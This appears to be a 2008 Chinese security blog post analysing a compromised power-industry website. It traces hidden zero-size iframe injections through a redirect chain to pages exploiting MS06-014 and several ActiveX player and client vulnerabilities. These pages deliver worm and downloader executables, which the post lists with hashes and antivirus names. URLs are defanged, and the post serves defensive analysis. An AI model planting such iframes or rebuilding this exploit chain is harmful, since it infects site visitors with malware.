某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel

某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel

endurer 原创
2008-05-28 第1

网页包含代码:
/---
<iframe src=hxxp://c**5.*5*i***6.us/c5.htm?8888 width=0 h'>
<iframe src="hxxp://125.*64.*92.*56/iisstart.htm" width="100" height="0"></iframe>
---/

#1 hxxp://c**5.*5*i***6.us/c5.htm?8888内容为:
/---
<iframe src=hxxp://www.*36**0c*36*0.***.cn/100.htm width=0 height=0></iframe>
---/

#1.1 hxxp://www.*36**0c*36*0.***.cn/100.htm 包含代码:
/---
<iframe style=display:none src="hxxp://www.*36**0a*36*0.***.cn/w/u.html"></iframe>
---/

#1.1.1 hxxp://www.*36**0a*36*0.***.cn/w/u.html 输出代码:
/---
<script src=1.gif></script>
<iframe width=100 height=0 src=6.gif></iframe>
<iframe width=100 height=0 src=5.gif></iframe>
<iframe width=100 height=0 src=3.gif></iframe>
<iframe width=100 height=0 src=2.gif></iframe>
<iframe width=100 height=0 src=7.gif></iframe>
<iframe width=100 height=0 src=4.gif></iframe>
---/

#1.1.1.1 hxxp://www.*36**0a*36*0.***.cn/w/1.gif

利用MS06-014漏洞下载 hxxp://www.*36**0a*36*0.***.cn/d/614.exe

文件说明符 : D:/test/614.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-5-28 18:14:48
修改时间 : 2008-5-28 18:14:49
访问时间 : 2008-5-28 18:15:15
大小 : 15180 字节 14.844 KB
MD5 : f30fd225bfae1c1ef6a349d8fd078a06
SHA1: 09B2F964291B216DE0FE69416C43EFF00A94B1D9
CRC32: 50053f7c

卡巴斯基报为 Worm.Win32.AutoRun.dnv

#1.1.1.2 hxxp://www.*36**0a*36*0.***.cn/w/2.gif

利用RealPlayer(IERPCtl.IERPCtl.1)漏洞 下载 hxxp://www.*36**0a*36*0.***.cn/d/r11.exe
r11.exe 同 614.exe

#1.1.1.3 hxxp://www.*36**0a*36*0.***.cn/w/3.gif

利用暴风影音(MPS.StormPlayer.1)漏洞下载 hxxp://www.*36**0a*36*0.***.cn/d/bf.exe,
bf.exe 同 614.exe

#1.1.1.4 hxxp://www.*36**0a*36*0.***.cn/w/4.gif

利用PPStream(POWERPLAYER.PowerPlayerCtrl.1,clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458)漏洞下载 hxxp://www.*36**0a*36*0.***.cn/d/pps.exe
pps.exe 同 614.exe

#1.1.1.5 hxxp://www.*36**0a*36*0.***.cn/w/5.gif

利用联众(GLCHAT.GLChatCtrl.1,clsid:61F5C358-60FB-4A23-A312-D2B556620F20)漏洞下载 hxxp://www.*36**0a*36*0.***.cn/d/lz.exe
lz.exe 同 614.exe

#1.1.1.6 hxxp://www.*36**0a*36*0.***.cn/w/6.gif

利用迅雷(DPClient.Vod,clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F)漏洞下载 hxxp://www.*36**0a*36*0.***.cn/d/xl.exe
xl.exe 同 614.exe

#1.1.1.7 hxxp://www.*36**0a*36*0.***.cn/w/7.gif

利用RealPlayer(IERPCtl.IERPCtl.1,clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93)漏洞 下载 hxxp://www.*36**0a*36*0.***.cn/d/r11.exe
r11.exe 同 614.exe

#1.1.1.8 利用 BaiduBar.Tool 下载 hxxp://www.*36**0a*36*0.***.cn/d/ad.cab,内含 ad.exe 同 614.exe

#2 hxxp://125.*64.*92.*56/iisstart.htm 包含代码:
/---
<iframe src="hxxp://d***.so**r**ryl*.biz/xx/am1.htm?12-8888" width="100" height="0"></iframe>
---/

#2.1 hxxp://d***.so**r**ryl*.biz/xx/am1.htm?12-8888 包含/输出代码:
/---
<iframe src="hxxp://d***.so**r**ryl*.biz/ax14.htm" width=100 height=0></iframe>
<iframe src="hxxp://d***.so**r**ryl*.biz/re10.htm" width=100 height=0></iframe>
<iframe src="hxxp://www.to**ngji**12**3.org/axfs.htm" width=100 height=0></iframe>
<iframe style=display:none src="hxxp://d***.so**r**ryl*.biz/axlz.htm"></iframe>
<iframe style=display:none src="hxxp://d***.so**r**ryl*.biz/re11.htm"></iframe>
---/


#2.1.1 hxxp://d***.so**r**ryl*.biz/ax14.htm

利用 MS06-014 漏洞下载 hxxp://www.to**ngji**12**3.org/soc.exe

文件说明符 : D:/test/soc.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-5-28 18:14:50
修改时间 : 2008-5-28 18:14:53
访问时间 : 2008-5-28 18:15:15
大小 : 22336 字节 21.832 KB
MD5 : d06728a40f94710ad45415cc43f58d0d
SHA1: 3396FB9041B8186BF0381711B1BC3AAEABFD609A
CRC32: e7d1a119

卡巴斯基报为 Trojan-Downloader.Win32.Losabel.nx

#2.1.2 hxxp://d***.so**r**ryl*.biz/re10.htm

利用 RealPlayer 漏洞下载 hxxp://www.to**ngji**12**3.org/soc.exe


#2.1.3 hxxp://www.to**ngji**12**3.org/axfs.htm
/---
文件不存在
---/

#2.1.4 hxxp://d***.so**r**ryl*.biz/axlz.htm

利用 联众世界(GLIEDown.IEDown.1,clsid:F917534D-535B-416B-8E8F-0C04756C31A8)漏洞下载 hxxp://www.to**ngji**12**3.org/soc.exe

#2.1.5 hxxp://d***.so**r**ryl*.biz/re11.htm

利用 RealPlayer(IERPCtl.IERPCtl.1,clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93)漏洞下载 hxxp://www.to**ngji**12**3.org/soc.exe

阅读更多
上一篇某文学网站上挂的logo.jpg /logo.exe 更新了
下一篇JavaScript编程实现字符和字符串翻转
想对作者说点什么? 我来说一句

没有更多推荐了,返回首页

关闭
关闭
关闭